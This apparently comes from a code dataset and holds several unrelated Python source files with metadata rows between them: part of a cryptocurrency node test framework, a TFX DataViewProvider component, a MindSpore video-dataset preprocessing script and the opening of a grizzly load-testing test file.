            if self.options.usecli and not self.supports_cli:
                raise SkipTest("--usecli specified but test does not support using CLI")
            self.skip_test_if_missing_module()
            self.setup_chain()
            self.setup_network()
            self.import_deterministic_coinbase_privkeys()
            self.run_test()
            success = TestStatus.PASSED
        except JSONRPCException as e:
            self.log.exception("JSONRPC error")
        except SkipTest as e:
            self.log.warning("Test Skipped: %s" % e.message)
            success = TestStatus.SKIPPED
        except AssertionError as e:
            self.log.exception("Assertion failed")
        except KeyError as e:
            self.log.exception("Key error")
        except Exception as e:
            self.log.exception("Unexpected exception caught during testing")
        except KeyboardInterrupt as e:
            self.log.warning("Exiting after keyboard interrupt")

        if success == TestStatus.FAILED and self.options.pdbonfailure:
            print("Testcase failed. Attaching python debugger. Enter ? for help")
            pdb.set_trace()

        self.log.debug('Closing down network thread')
        self.network_thread.close()
        if not self.options.noshutdown:
            self.log.info("Stopping nodes")
            if self.nodes:
                self.stop_nodes()
        else:
            # Leave the nodes running for post-mortem inspection.
            for node in self.nodes:
                node.cleanup_on_exit = False
            self.log.info("Note: wescoinds were not stopped and may still be running")

        if not self.options.nocleanup and not self.options.noshutdown and success != TestStatus.FAILED:
            self.log.info("Cleaning up {} on exit".format(self.options.tmpdir))
            cleanup_tree_on_exit = True
        else:
            self.log.warning("Not cleaning up dir %s" % self.options.tmpdir)
            cleanup_tree_on_exit = False

        # Map the TestStatus to a process exit code for the runner.
        if success == TestStatus.PASSED:
            self.log.info("Tests successful")
            exit_code = TEST_EXIT_PASSED
        elif success == TestStatus.SKIPPED:
            self.log.info("Test skipped")
            exit_code = TEST_EXIT_SKIPPED
        else:
            self.log.error("Test failed. Test logging available at %s/test_framework.log", self.options.tmpdir)
            self.log.error("Hint: Call {} '{}' to consolidate all logs".format(os.path.normpath(os.path.dirname(os.path.realpath(__file__)) + "/../combine_logs.py"), self.options.tmpdir))
            exit_code = TEST_EXIT_FAILED
        # Flush log handlers before deleting the directory they write into.
        logging.shutdown()
        if cleanup_tree_on_exit:
            shutil.rmtree(self.options.tmpdir)
        sys.exit(exit_code)

    # Methods to override in subclass test scripts.
    def set_test_params(self):
        """Tests must this method to change default values for number of nodes, topology, etc"""
        raise NotImplementedError

    def add_options(self, parser):
        """Override this method to add command-line options to the test"""
        pass

    def skip_test_if_missing_module(self):
        """Override this method to skip a test if a module is not compiled"""
        pass

    def setup_chain(self):
        """Override this method to customize blockchain setup"""
        self.log.info("Initializing test directory " + self.options.tmpdir)
        if self.setup_clean_chain:
            self._initialize_chain_clean()
        else:
            self._initialize_chain()

    def setup_network(self):
        """Override this method to customize test network topology"""
        self.setup_nodes()

        # Connect the nodes as a "chain". This allows us
        # to split the network between nodes 1 and 2 to get
        # two halves that can work on competing chains.
        for i in range(self.num_nodes - 1):
            connect_nodes_bi(self.nodes, i, i + 1)
        self.sync_all()

    def setup_nodes(self):
        """Override this method to customize test node setup"""
        extra_args = None
        if hasattr(self, "extra_args"):
            extra_args = self.extra_args
        self.add_nodes(self.num_nodes, extra_args)
        self.start_nodes()

    def import_deterministic_coinbase_privkeys(self):
        # Make the deterministic coinbase rewards spendable from each node's
        # wallet. Skipped for clean chains (no premined blocks to claim).
        if self.setup_clean_chain:
            return

        for n in self.nodes:
            try:
                n.getwalletinfo()
            except JSONRPCException as e:
                # Node built without wallet support: nothing to import.
                assert str(e).startswith('Method not found')
                continue

            n.importprivkey(n.get_deterministic_priv_key()[1])

    def run_test(self):
        """Tests must override this method to define test logic"""
        raise NotImplementedError

    # Public helper methods. These can be accessed by the subclass test scripts.

    def add_nodes(self, num_nodes, extra_args=None, *, rpchost=None, binary=None):
        """Instantiate TestNode objects"""
        if self.bind_to_localhost_only:
            extra_confs = [["bind=127.0.0.1"]] * num_nodes
        else:
            extra_confs = [[]] * num_nodes
        if extra_args is None:
            extra_args = [[]] * num_nodes
        if binary is None:
            binary = [self.options.wescoind] * num_nodes
        # One per-node entry required for every configurable list.
        assert_equal(len(extra_confs), num_nodes)
        assert_equal(len(extra_args), num_nodes)
        assert_equal(len(binary), num_nodes)
        for i in range(num_nodes):
            self.nodes.append(TestNode(i, get_datadir_path(self.options.tmpdir, i), rpchost=rpchost, timewait=self.rpc_timewait, wescoind=binary[i], wescoin_cli=self.options.wescoincli, mocktime=self.mocktime, coverage_dir=self.options.coveragedir, extra_conf=extra_confs[i], extra_args=extra_args[i], use_cli=self.options.usecli))

    def start_node(self, i, *args, **kwargs):
        """Start a wescoind"""
        node = self.nodes[i]

        node.start(*args, **kwargs)
        node.wait_for_rpc_connection()

        if self.options.coveragedir is not None:
            coverage.write_all_rpc_commands(self.options.coveragedir, node.rpc)

    def start_nodes(self, extra_args=None, *args, **kwargs):
        """Start multiple wescoinds"""
        if extra_args is None:
            extra_args = [None] * self.num_nodes
        assert_equal(len(extra_args), self.num_nodes)
        try:
            for i, node in enumerate(self.nodes):
                node.start(extra_args[i], *args, **kwargs)
            for node in self.nodes:
                node.wait_for_rpc_connection()
        except:
            # If one node failed to start, stop the others
            self.stop_nodes()
            raise

        if self.options.coveragedir is not None:
            for node in self.nodes:
                coverage.write_all_rpc_commands(self.options.coveragedir, node.rpc)

    def stop_node(self, i, expected_stderr=''):
        """Stop a wescoind test node"""
        self.nodes[i].stop_node(expected_stderr)
        self.nodes[i].wait_until_stopped()

    def stop_nodes(self):
        """Stop multiple wescoind test nodes"""
        for node in self.nodes:
            # Issue RPC to stop nodes
            node.stop_node()

        for node in self.nodes:
            # Wait for nodes to stop
            node.wait_until_stopped()

    def restart_node(self, i, extra_args=None):
        """Stop and start a test node"""
        self.stop_node(i)
        self.start_node(i, extra_args)

    def wait_for_node_exit(self, i, timeout):
        # Block until the node's subprocess terminates (or timeout expires).
        self.nodes[i].process.wait(timeout)

    def split_network(self):
        """
        Split the network of four nodes into nodes 0/1 and 2/3.
        """
        disconnect_nodes(self.nodes[1], 2)
        disconnect_nodes(self.nodes[2], 1)
        self.sync_all([self.nodes[:2], self.nodes[2:]])

    def join_network(self):
        """
        Join the (previously split) network halves together.
        """
        connect_nodes_bi(self.nodes, 1, 2)
        self.sync_all()

    def sync_all(self, node_groups=None):
        # Sync blocks then mempools within each group (default: all nodes).
        if not node_groups:
            node_groups = [self.nodes]

        for group in node_groups:
            sync_blocks(group)
            sync_mempools(group)

    def enable_mocktime(self):
        """Enable mocktime for the script.

        mocktime may be needed for scripts that use the cached version of the
        blockchain. If the cached version of the blockchain is used without
        mocktime then the mempools will not sync due to IBD.

        For backward compatibility of the python scripts with previous
        versions of the cache, this helper function sets mocktime to Jan 1,
        2014 + (201 * 10 * 60)"""
        self.mocktime = 1388534400 + (201 * 10 * 60)

    def disable_mocktime(self):
        self.mocktime = 0

    # Private helper methods. These should not be accessed by the subclass test scripts.

    def _start_logging(self):
        # Add logger and logging handlers
        self.log = logging.getLogger('TestFramework')
        self.log.setLevel(logging.DEBUG)
        # Create file handler to log all messages
        fh = logging.FileHandler(self.options.tmpdir + '/test_framework.log', encoding='utf-8')
        fh.setLevel(logging.DEBUG)
        # Create console handler to log messages to stderr. By default this logs only error messages, but can be configured with --loglevel.
        ch = logging.StreamHandler(sys.stdout)
        # User can provide log level as a number or string (eg DEBUG). loglevel was caught as a string, so try to convert it to an int
        ll = int(self.options.loglevel) if self.options.loglevel.isdigit() else self.options.loglevel.upper()
        ch.setLevel(ll)
        # Format logs the same as wescoind's debug.log with microprecision (so log files can be concatenated and sorted)
        formatter = logging.Formatter(fmt='%(asctime)s.%(msecs)03d000Z %(name)s (%(levelname)s): %(message)s', datefmt='%Y-%m-%dT%H:%M:%S')
        formatter.converter = time.gmtime
        fh.setFormatter(formatter)
        ch.setFormatter(formatter)

        # add the handlers to the logger
        self.log.addHandler(fh)
        self.log.addHandler(ch)

        if self.options.trace_rpc:
            rpc_logger = logging.getLogger("WescoinRPC")
            rpc_logger.setLevel(logging.DEBUG)
            rpc_handler = logging.StreamHandler(sys.stdout)
            rpc_handler.setLevel(logging.DEBUG)
            rpc_logger.addHandler(rpc_handler)

    def _initialize_chain(self):
        """Initialize a pre-mined blockchain for use by the test.

        Create a cache of a 200-block-long chain (with wallet) for MAX_NODES
        Afterward, create num_nodes copies from the cache."""
        assert self.num_nodes <= MAX_NODES
        create_cache = False
        for i in range(MAX_NODES):
            if not os.path.isdir(get_datadir_path(self.options.cachedir, i)):
                # Any missing cached datadir invalidates the whole cache.
                create_cache = True
                break

        if create_cache:
            self.log.debug("Creating data directories from cached datadir")

            # find and delete old cache directories if any exist
            for i in range(MAX_NODES):
                if os.path.isdir(get_datadir_path(self.options.cachedir, i)):
                    shutil.rmtree(get_datadir_path(self.options.cachedir, i))

            # Create cache directories, run wescoinds:
            for i in range(MAX_NODES):
                datadir = initialize_datadir(self.options.cachedir, i)
                args = [self.options.wescoind, "-datadir=" + datadir, '-disablewallet']
                if i > 0:
                    args.append("-connect=127.0.0.1:" + str(p2p_port(0)))
                self.nodes.append(TestNode(i, get_datadir_path(self.options.cachedir, i), extra_conf=["bind=127.0.0.1"], extra_args=[], rpchost=None, timewait=self.rpc_timewait, wescoind=self.options.wescoind, wescoin_cli=self.options.wescoincli, mocktime=self.mocktime, coverage_dir=None))
                self.nodes[i].args = args
                self.start_node(i)

            # Wait for RPC connections to be ready
            for node in self.nodes:
                node.wait_for_rpc_connection()

            # Create a 200-block-long chain; each of the 4 first nodes
            # gets 25 mature blocks and 25 immature.
            # Note: To preserve compatibility with older versions of
            # initialize_chain, only 4 nodes will generate coins.
            #
            # blocks are created with timestamps 10 minutes apart
            # starting from 2010 minutes in the past
            self.enable_mocktime()
            block_time = self.mocktime - (201 * 10 * 60)
            for i in range(2):
                for peer in range(4):
                    for j in range(25):
                        set_node_times(self.nodes, block_time)
                        self.nodes[peer].generatetoaddress(1, self.nodes[peer].get_deterministic_priv_key()[0])
                        block_time += 10 * 60
                    # Must sync before next peer starts generating blocks
                    sync_blocks(self.nodes)

            # Shut them down, and clean up cache directories:
            self.stop_nodes()
            self.nodes = []
            self.disable_mocktime()

            def cache_path(n, *paths):
                # Path inside node n's cached regtest datadir.
                return os.path.join(get_datadir_path(self.options.cachedir, n), "regtest", *paths)

            # Keep only the chainstate/blocks data; everything else is
            # per-run state that must not leak into future test runs.
            for i in range(MAX_NODES):
                os.rmdir(cache_path(i, 'wallets'))  # Remove empty wallets dir
                for entry in os.listdir(cache_path(i)):
                    if entry not in ['chainstate', 'blocks']:
                        os.remove(cache_path(i, entry))

        for i in range(self.num_nodes):
            from_dir = get_datadir_path(self.options.cachedir, i)
            to_dir = get_datadir_path(self.options.tmpdir, i)
            shutil.copytree(from_dir, to_dir)
            initialize_datadir(self.options.tmpdir, i)  # Overwrite port/rpcport in wescoin.conf

    def _initialize_chain_clean(self):
        """Initialize empty blockchain for use by the test.

        Create an empty blockchain and num_nodes wallets.
        Useful if a test case wants complete control over initialization."""
        for i in range(self.num_nodes):
            initialize_datadir(self.options.tmpdir, i)

    def skip_if_no_py3_zmq(self):
        """Attempt to import the zmq package and skip the test if the import fails."""
        try:
            import zmq  # noqa
        except ImportError:
            raise SkipTest("python3-zmq module not available.")

    def skip_if_no_wescoind_zmq(self):
        """Skip the running test if wescoind has not been compiled with zmq support."""
        if not self.is_zmq_compiled():
            raise SkipTest("wescoind has not been built with zmq enabled.")

    def skip_if_no_wallet(self):
        """Skip the running test if wallet has not been compiled."""
        if not self.is_wallet_compiled():
            raise SkipTest("wallet has not been compiled.")

    def skip_if_no_cli(self):
        """Skip the running test if wescoin-cli has not been compiled."""
        if not self.is_cli_compiled():
            raise SkipTest("wescoin-cli has not been compiled.")

    def is_cli_compiled(self):
        """Checks whether wescoin-cli was compiled."""
        config = configparser.ConfigParser()
        config.read_file(open(self.options.configfile))

        return config["components"].getboolean("ENABLE_UTILS")

    def is_wallet_compiled(self):
        """Checks whether the wallet module was compiled."""
        config = configparser.ConfigParser()
        config.read_file(open(self.options.configfile))

        return config["components"].getboolean("ENABLE_WALLET")

    def is_zmq_compiled(self):
        """Checks whether the zmq module was compiled."""
        config = configparser.ConfigParser()
        config.read_file(open(self.options.configfile))

        return config["components"].getboolean("ENABLE_ZMQ")
| 42.044199 | 331 | 0.63329 |
acf693e0f26d3441c42022027128db013ad118af | 3,494 | py | Python | tfx/components/experimental/data_view/provider_component.py | TimoKerr/tfx | 10d13d57eeac21514fed73118cb43464dada67f1 | [
"Apache-2.0"
] | 1 | 2021-05-10T10:41:06.000Z | 2021-05-10T10:41:06.000Z | tfx/components/experimental/data_view/provider_component.py | TimoKerr/tfx | 10d13d57eeac21514fed73118cb43464dada67f1 | [
"Apache-2.0"
] | null | null | null | tfx/components/experimental/data_view/provider_component.py | TimoKerr/tfx | 10d13d57eeac21514fed73118cb43464dada67f1 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""TFX DataViewProvider component definition."""
from typing import Optional, Text
from tfx import types
from tfx.components.experimental.data_view import provider_executor
from tfx.dsl.components.base import base_component
from tfx.dsl.components.base import executor_spec
from tfx.types import standard_artifacts
from tfx.types.component_spec import ChannelParameter
from tfx.types.component_spec import ComponentSpec
from tfx.types.component_spec import ExecutionParameter
class _TfGraphDataViewProviderSpec(ComponentSpec):
  """DataViewProvider component spec."""

  PARAMETERS = {
      # Optional path to a python module file from which the decoder factory
      # is loaded; when absent, 'create_decoder_func' must be a dotted path.
      'module_file': ExecutionParameter(type=(str, Text), optional=True),
      # Name (or dotted path) of the function that creates the
      # TfGraphRecordDecoder.
      'create_decoder_func': ExecutionParameter(type=(str, Text))
  }
  INPUTS = {}
  OUTPUTS = {
      # The produced DataView artifact (decoder saved as a TF SavedModel).
      'data_view': ChannelParameter(type=standard_artifacts.DataView),
  }
class TfGraphDataViewProvider(base_component.BaseComponent):
  """A component providing a tfx_bsl.coders.TfGraphRecordDecoder as a DataView.

  User needs to define a function that creates such a TfGraphRecordDecoder.
  This component, when running, calls that function and writes the resulting
  decoder (in the form of a TF SavedModel) as its output artifact.

  Example:
  ```
  # Import a decoder that can be created by a function 'create_decoder()' in
  # module_file:
  data_view_provider = TfGraphDataViewProvider(
      module_file=module_file,
      create_decoder_func='create_decoder')
  ```
  """

  SPEC_CLASS = _TfGraphDataViewProviderSpec
  EXECUTOR_SPEC = executor_spec.ExecutorClassSpec(
      provider_executor.TfGraphDataViewProviderExecutor)

  def __init__(self,
               create_decoder_func: Text,
               module_file: Optional[Text] = None,
               data_view: Optional[types.Channel] = None):
    """Constructs a TfGraphDataViewProvider component.

    Args:
      create_decoder_func: If `module_file` is not None, the name of the
        function in `module_file` used to create the TfGraphRecordDecoder.
        Otherwise a dot-delimited path to such a function (e.g.
        "some_package.some_module.some_func"). The function must have the
        following signature:

        def create_decoder_func() -> tfx_bsl.coder.TfGraphRecordDecoder:
          ...
      module_file: The file path to a python module file, from which the
        function named after `create_decoder_func` will be loaded. If not
        provided, `create_decoder_func` is expected to be a path to a
        function.
      data_view: Output 'DataView' channel, in which the decoder will be
        saved. A new channel is created when not supplied.
    """
    # Fall back to a fresh DataView channel only when the caller supplied
    # nothing (an explicitly passed channel is always respected).
    output_channel = (
        data_view if data_view is not None else
        types.Channel(type=standard_artifacts.DataView))
    super().__init__(spec=_TfGraphDataViewProviderSpec(
        module_file=module_file,
        create_decoder_func=create_decoder_func,
        data_view=output_channel))
| 39.258427 | 80 | 0.740985 |
acf69592d80507bba0d511163933e7f4a769c0b7 | 9,064 | py | Python | official/cv/c3d/src/tools/dataset_preprocess.py | leelige/mindspore | 5199e05ba3888963473f2b07da3f7bca5b9ef6dc | [
"Apache-2.0"
] | 77 | 2021-10-15T08:32:37.000Z | 2022-03-30T13:09:11.000Z | official/cv/c3d/src/tools/dataset_preprocess.py | leelige/mindspore | 5199e05ba3888963473f2b07da3f7bca5b9ef6dc | [
"Apache-2.0"
] | 3 | 2021-10-30T14:44:57.000Z | 2022-02-14T06:57:57.000Z | official/cv/c3d/src/tools/dataset_preprocess.py | leelige/mindspore | 5199e05ba3888963473f2b07da3f7bca5b9ef6dc | [
"Apache-2.0"
] | 24 | 2021-10-15T08:32:45.000Z | 2022-03-24T18:45:20.000Z | # Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import os
import sys
import json
import cv2
def unzip_rawrarfile(dataset_name, root_dir_path):
    """Extracts the raw HMDB51/UCF101 archives under `root_dir_path`.

    Shells out to `rar`/`unzip` to unpack the split files into a `*_txt`
    directory and the videos into a `*_video` directory. Requires the
    archives to already be present in `root_dir_path`.

    Args:
        dataset_name: 'HMDB51' or 'UCF101'.
        root_dir_path: directory containing the downloaded archives.

    Raises:
        InterruptedError: for any other dataset name.
    """
    os.chdir(root_dir_path)
    if dataset_name == 'HMDB51':
        # Split lists first, then the nested per-class video archives.
        for shell_cmd in ('rar x test_train_splits.rar',
                          'mv ./testTrainMulti_7030_splits ./hmdb-51_txt',
                          'rar x hmdb51_org.rar hmdb-51/ ',
                          'mkdir hmdb-51_video/'):
            os.system(command=shell_cmd)
        os.chdir('hmdb-51_video/')
        for shell_cmd in ('ls ../hmdb-51/*.rar | xargs -n1 rar x',
                          'rm -rf ../hmdb-51/'):
            os.system(command=shell_cmd)
    elif dataset_name == 'UCF101':
        for shell_cmd in ('unzip UCF101TrainTestSplits-RecognitionTask.zip',
                          'mv ./ucfTrainTestlist ./UCF-101_txt',
                          'rar x UCF101.rar ',
                          'mv UCF-101/ UCF-101_video/'):
            os.system(command=shell_cmd)
    else:
        print('Dataset {} is not surpported !'.format(dataset_name))
        raise InterruptedError
def video_2_img(dataset_name, root_dir_path):
    """Convert every extracted video of a dataset into per-frame JPEGs.

    Walks ``<root>/<dataset>_video/<action>/<video>`` and delegates each
    video to ``process_video``, which writes its frames under
    ``<root>/<dataset>_img/<action>/<video name>/``.

    Args:
        dataset_name: Either ``'HMDB51'`` or ``'UCF101'``.
        root_dir_path: Root directory produced by ``unzip_rawrarfile``.

    Raises:
        InterruptedError: If ``dataset_name`` is not supported.
    """
    if dataset_name == 'HMDB51':
        img_dir_name = 'hmdb-51_img'
        video_dir_name = 'hmdb-51_video'
    elif dataset_name == 'UCF101':
        img_dir_name = 'UCF-101_img'
        video_dir_name = 'UCF-101_video'
    else:
        # Fixed typo in the user-facing message ("surpported" -> "supported").
        print('Dataset {} is not supported !'.format(dataset_name))
        raise InterruptedError
    img_dir = os.path.join(root_dir_path, img_dir_name)
    video_dir = os.path.join(root_dir_path, video_dir_name)
    # One sub-directory per action class, each containing its video files.
    for file in os.listdir(video_dir):
        file_path = os.path.join(video_dir, file)
        output_dir_ = os.path.join(img_dir, file)
        for video in os.listdir(file_path):
            process_video(video, file, output_dir_, video_dir)
    print('DataSet Preprocessing finished.')
def process_video(video, action_name, save_dir, video_dir):
    """Split one video into JPEG frames on disk.

    Reads ``<video_dir>/<action_name>/<video>`` and writes every
    ``EXTRACT_FREQUENCY``-th frame to ``<save_dir>/<video name>/``.

    Args:
        video: Video file name (e.g. ``clip.avi``).
        action_name: Action-class directory holding the video.
        save_dir: Image output root for this action class.
        video_dir: Root directory containing the action-class directories.
    """
    # Initialize a VideoCapture object to read video data into a numpy array
    video_filename = video.split('.')[0]
    os.makedirs(os.path.join(save_dir, video_filename), exist_ok=True)
    capture = cv2.VideoCapture(os.path.join(video_dir, action_name, video))
    frame_count = int(capture.get(cv2.CAP_PROP_FRAME_COUNT))
    # Make sure splited video has at least 16 frames.
    # NOTE(review): a single decrement (4 -> 3) does not guarantee 16 frames
    # for very short videos -- confirm whether further decrements are wanted.
    EXTRACT_FREQUENCY = 4
    if frame_count // EXTRACT_FREQUENCY <= 16:
        EXTRACT_FREQUENCY -= 1
    count = 0
    i = 0
    retaining = True
    while (count < frame_count and retaining):
        retaining, frame = capture.read()
        if frame is None:
            # Bug fix: the previous ``continue`` never advanced ``count``, so
            # a None frame with ``retaining`` still True looped forever.
            break
        if count % EXTRACT_FREQUENCY == 0:
            # Zero-pad the frame index so that lexicographic sorting of the
            # file names matches temporal order (the old '0000{}' scheme put
            # '000010.jpg' before '00002.jpg' when sorted).
            cv2.imwrite(filename=os.path.join(save_dir, video_filename, '{:05d}.jpg'.format(i)), img=frame)
            i += 1
        count += 1
    # Release the VideoCapture once it is no longer needed
    capture.release()
    print(action_name, video, count, i, frame_count)
def gen_json_HMDB51(root_dir_path, flod=1):
    """Build train/test/val JSON annotation files for HMDB51.

    Reads the ``*_test_split<flod>.txt`` files from ``hmdb-51_txt`` and
    writes ``train.json``, ``test.json`` and ``val.json`` into
    ``hmdb-51_json`` via ``write_json``.

    Args:
        root_dir_path: Dataset root directory.
        flod: Which of the official split folds to use (1, 2 or 3).
    """
    json_root = os.path.join(root_dir_path, 'hmdb-51_json')
    txt_root = os.path.join(root_dir_path, 'hmdb-51_txt')
    img_path = os.path.join(root_dir_path, 'hmdb-51_img')
    os.makedirs(json_root, exist_ok=True)
    # Class labels follow this fixed action ordering (indices 0..50).
    class_names = (
        'brush_hair', 'cartwheel', 'catch', 'chew', 'clap', 'climb_stairs',
        'climb', 'dive', 'draw_sword', 'dribble', 'drink', 'eat',
        'fall_floor', 'fencing', 'flic_flac', 'golf', 'handstand', 'hit',
        'hug', 'jump', 'kick_ball', 'kick', 'kiss', 'laugh', 'pick', 'pour',
        'pullup', 'punch', 'push', 'pushup', 'ride_bike', 'ride_horse',
        'run', 'shake_hands', 'shoot_ball', 'shoot_bow', 'shoot_gun', 'sit',
        'situp', 'smile', 'smoke', 'somersault', 'stand', 'swing_baseball',
        'sword_exercise', 'sword', 'talk', 'throw', 'turn', 'walk', 'wave',
    )
    label_dict = {name: index for index, name in enumerate(class_names)}
    # Split flag in the txt files: '1' = train, '2' = test, '0' = validation.
    splits = {'1': [], '2': [], '0': []}
    for txt_file_name in os.listdir(txt_root):
        if 'split{}.txt'.format(flod) not in txt_file_name:
            continue
        # File names look like '<action>_test_split<k>.txt'.
        action = txt_file_name.split('_test_')[0]
        with open(os.path.join(txt_root, txt_file_name), 'r') as txt_file:
            for raw_line in txt_file.readlines():
                fields = raw_line.strip().split(' ')
                if len(fields) != 2:
                    continue
                if fields[1] in splits:
                    splits[fields[1]].append((action, fields[0]))
                else:
                    # Unknown split flag: report and skip.
                    print(fields)
    write_json(splits['1'], os.path.join(json_root, 'train.json'), img_path, label_dict)
    write_json(splits['2'], os.path.join(json_root, 'test.json'), img_path, label_dict)
    write_json(splits['0'], os.path.join(json_root, 'val.json'), img_path, label_dict)
def gen_json_UCF101(root_dir_path, flod=1):
    """Build train/test JSON annotation files for UCF101.

    Reads ``classInd.txt`` plus the ``trainlist0<flod>.txt`` /
    ``testlist0<flod>.txt`` split files from ``UCF-101_txt`` and writes
    ``train.json`` / ``test.json`` into ``UCF-101_json`` via ``write_json``.

    Args:
        root_dir_path: Dataset root directory.
        flod: Which of the official split folds to use (1, 2 or 3).
    """
    json_root = os.path.join(root_dir_path, 'UCF-101_json')
    txt_root = os.path.join(root_dir_path, 'UCF-101_txt')
    img_path = os.path.join(root_dir_path, 'UCF-101_img')
    os.makedirs(json_root, exist_ok=True)
    # classInd.txt lines look like '<number> <ClassName>'; the running line
    # index (0-based), not the number in the file, is used as the label.
    label_dict = {}
    with open(os.path.join(txt_root, 'classInd.txt'), 'r') as class_file:
        for index, line in enumerate(class_file.readlines()):
            stripped = line.strip()
            if stripped:
                label_dict[stripped.split(' ')[1]] = index

    def read_split(file_name, drop_label):
        # Each entry becomes ['<action>', '<video file>'].
        entries = []
        with open(os.path.join(txt_root, file_name), 'r') as split_file:
            for line in split_file.readlines():
                stripped = line.strip()
                if not stripped:
                    continue
                if drop_label:
                    # Train lines carry a trailing class number; keep the path only.
                    stripped = stripped.split(' ')[0]
                entries.append(stripped.split('/'))
        return entries

    train_list = read_split('trainlist0{}.txt'.format(flod), drop_label=True)
    test_list = read_split('testlist0{}.txt'.format(flod), drop_label=False)
    write_json(train_list, os.path.join(json_root, 'train.json'), img_path, label_dict)
    write_json(test_list, os.path.join(json_root, 'test.json'), img_path, label_dict)
def write_json(video_list, dest_path, img_path, label_dict):
    """Serialize frame annotations for a list of videos to a JSON file.

    Args:
        video_list: Iterable of ``(action, video)`` pairs; ``video`` may
            carry an ``.avi`` suffix, which is stripped.
        dest_path: Path of the JSON file to write.
        img_path: Root directory holding ``<action>/<video>/<frame>.jpg``.
        label_dict: Mapping from action name to integer class id.

    The output is a list of records, one per video, each with a ``frames``
    list (frame file name plus its action class) and a ``base_path``
    relative to ``img_path``.
    """
    dest_data = []
    for action, video in video_list:
        video_name = video.replace('.avi', '')
        # Sort for a deterministic frame order.
        video_images = sorted(os.listdir(os.path.join(img_path, action, video_name)))
        dest_data_lvl1 = {'frames': []}
        for video_image in video_images:
            # Only the bare file name is stored; readers join it with
            # base_path.  (The old code built full paths and immediately
            # split the basename back off.)
            dest_data_lvl1['frames'].append(
                {'img_path': video_image, 'actions': [{'action_class': label_dict[action]}]})
        dest_data_lvl1['base_path'] = os.path.join(action, video_name)
        dest_data.append(dest_data_lvl1)
    with open(dest_path, 'w') as outfile:
        json.dump(dest_data, outfile, indent=4)
def gen_json(dataset, root_dir_path, split_flod):
    """Dispatch JSON annotation generation for the chosen dataset.

    Args:
        dataset: Either ``'HMDB51'`` or ``'UCF101'``.
        root_dir_path: Dataset root directory.
        split_flod: Split fold forwarded to the dataset-specific generator.

    Raises:
        InterruptedError: If ``dataset`` is not supported.
    """
    if dataset == 'HMDB51':
        gen_json_HMDB51(root_dir_path, split_flod)
    elif dataset == 'UCF101':
        gen_json_UCF101(root_dir_path, split_flod)
    else:
        # Fixed typo in the user-facing message ("surpported" -> "supported").
        print('Dataset {} is not supported !'.format(dataset))
        raise InterruptedError
    print('Generating Training and Test JSON Files OK !')
def data_preprocess(dataset, root_dir_path, split_flod=1):
    """Run the full pipeline: unpack archives, split to frames, write JSON.

    Args:
        dataset: Either ``'HMDB51'`` or ``'UCF101'``.
        root_dir_path: Dataset root directory, or any file inside it.
        split_flod: Split fold forwarded to the JSON generators.
    """
    # A file path is accepted as well: use its parent directory.
    if os.path.isfile(root_dir_path):
        root_dir_path = os.path.dirname(root_dir_path)
    for stage in (unzip_rawrarfile, video_2_img):
        stage(dataset, root_dir_path)
    gen_json(dataset, root_dir_path, split_flod)
if __name__ == "__main__":
    # CLI: dataset_preprocess.py <dataset name> <dataset root> <split fold>
    dataset_name_ = sys.argv[1]  # Dataset name ('HMDB51' or 'UCF101')
    root_dir_path_ = sys.argv[2]  # Dataset rar file path
    split_flod_ = sys.argv[3]  # Split fold to use (note: passed as a string)
    data_preprocess(dataset_name_, root_dir_path_, split_flod_)
| 40.464286 | 112 | 0.6015 |
acf695da5074aa456c41adaee634832500097c22 | 7,763 | py | Python | tests/test_grizzly/test_environment.py | mgor/grizzly | cbcb1b8b44682330f82bb4d24904fb6601b6f1b0 | [
"MIT"
] | null | null | null | tests/test_grizzly/test_environment.py | mgor/grizzly | cbcb1b8b44682330f82bb4d24904fb6601b6f1b0 | [
"MIT"
] | 9 | 2022-01-05T08:53:41.000Z | 2022-03-31T07:26:05.000Z | tests/test_grizzly/test_environment.py | mgor/grizzly | cbcb1b8b44682330f82bb4d24904fb6601b6f1b0 | [
"MIT"
] | null | null | null | from os import environ
from typing import Any, Tuple, Dict, Optional, cast
from time import monotonic as time_monotonic
import pytest
from pytest_mock import MockerFixture
from behave.runner import Context, Runner
from behave.configuration import Configuration
from behave.model import Feature, Step, Status
from grizzly.environment import before_feature, after_feature, before_scenario, after_scenario, before_step, after_step
from grizzly.context import GrizzlyContext
from grizzly.steps.setup import step_setup_variable_value_ask as step_both
from grizzly.steps.background.setup import step_setup_save_statistics as step_background
from grizzly.steps.scenario.setup import step_setup_iterations as step_scenario
from grizzly.tasks import AsyncRequestGroupTask, TimerTask
from ..fixtures import BehaveFixture
def test_before_feature() -> None:
    # Start from a clean slate: the hook reads/writes GRIZZLY_CONTEXT_ROOT.
    try:
        del environ['GRIZZLY_CONTEXT_ROOT']
    except:
        pass
    try:
        base_dir = '.'
        # Minimal behave Context, constructed the way behave itself would.
        context = Context(
            runner=Runner(
                config=Configuration(
                    command_args=[],
                    load_config=False,
                    base_dir=base_dir,
                )
            )
        )
        assert not hasattr(context, 'grizzly')
        assert environ.get('GRIZZLY_CONTEXT_ROOT', None) is None
        before_feature(context)
        # The hook attaches a GrizzlyContext and exports the base directory.
        assert hasattr(context, 'grizzly')
        assert context.grizzly.__class__.__name__ == 'GrizzlyContext'
        assert environ.get('GRIZZLY_CONTEXT_ROOT', None) == base_dir
        # A pre-existing attribute of the wrong type is replaced by the hook.
        context.grizzly = object()
        before_feature(context)
        assert hasattr(context, 'grizzly')
        assert context.grizzly.__class__.__name__ == 'GrizzlyContext'
        # The hook also records a start marker (used for feature duration).
        assert hasattr(context, 'started')
    finally:
        # Leave the process environment the way we found it.
        try:
            del environ['GRIZZLY_CONTEXT_ROOT']
        except:
            pass
def test_after_feature(behave_fixture: BehaveFixture, mocker: MockerFixture) -> None:
